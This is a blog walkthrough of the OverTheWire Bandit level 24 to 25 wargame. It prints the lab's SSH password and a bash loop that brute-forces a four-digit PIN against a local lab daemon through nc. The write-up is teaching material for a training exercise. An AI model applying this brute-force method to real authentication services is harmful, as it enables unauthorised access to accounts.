Bandit Level 24 → Level 25 | OverTheWire


Learn linux command by playing Bandit wargame. The Bandit wargame is aimed at absolute beginners. It will teach the basics needed to be able to play other wargames. Below is the solution of Bandit Level 24 → Level 25.

In this level you will learn how to bruteforce password and connect to a remote machine on a port.

The passwords are hidden, so you have to find the passwords for next level yourself.

Bandit OverTheWire

Previous Post

Bandit Level 0 to Level 3
Bandit Level 4 to Level 8
Bandit Level 9 to Level 11
Bandit Level 12 → Level 13
Bandit Level 13 to Level 15
Bandit Level 16 to Level 18
Bandit Level 19 to Level 20
Bandit Level 21 to Level 22
Bandit Level 23 → Level 24

Bandit Level 24 → Level 25

Level Goal

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

Solution :

Command to connect remote host : ssh bandit24@bandit.labs.overthewire.org -p 2220 password is UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ .

We can connect on port 30002 in a same way as we have done in level 20. We also have to pass password for current level and the 4 digit pin.The command is

1

nc localhost 30002  UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ ****

To brute-force pin we wil write a shell script in /tmp/mydir123 directory.

The script is

1
2
3
4
5

#!/bin/bash
for i in {0000..9999}
do 
	echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i"
done

The name of the script is bruteforcescript.sh and file combinations.txt will store all combinations of 4 digit number with password for bandit20. First we have to make bruteforcescript.sh executable using command

1
2

chmod 700 bruteforcescript.sh
./bruteforcescript.sh > combinations.txt

And the final command is

1

nc localhost 30002 < combinations.txt

The password for the next level is **** .

Bandit Level 24 25

Reference : https://unix.stackexchange.com/questions/432904/brute-force-4-digit-pin-with-pass-using-shell-script
https://skyenet.tech/brute-force-password-attacking/

Next Post

Bandit Level 25 to Level 26
Bandit Level 27 to Level 31
Bandit Level 32 → Level 33

Other Wargames

Leviathan Wargame from OverTheWire All Level Solutions
Krypton Wargame from OverTheWire All Level Solutions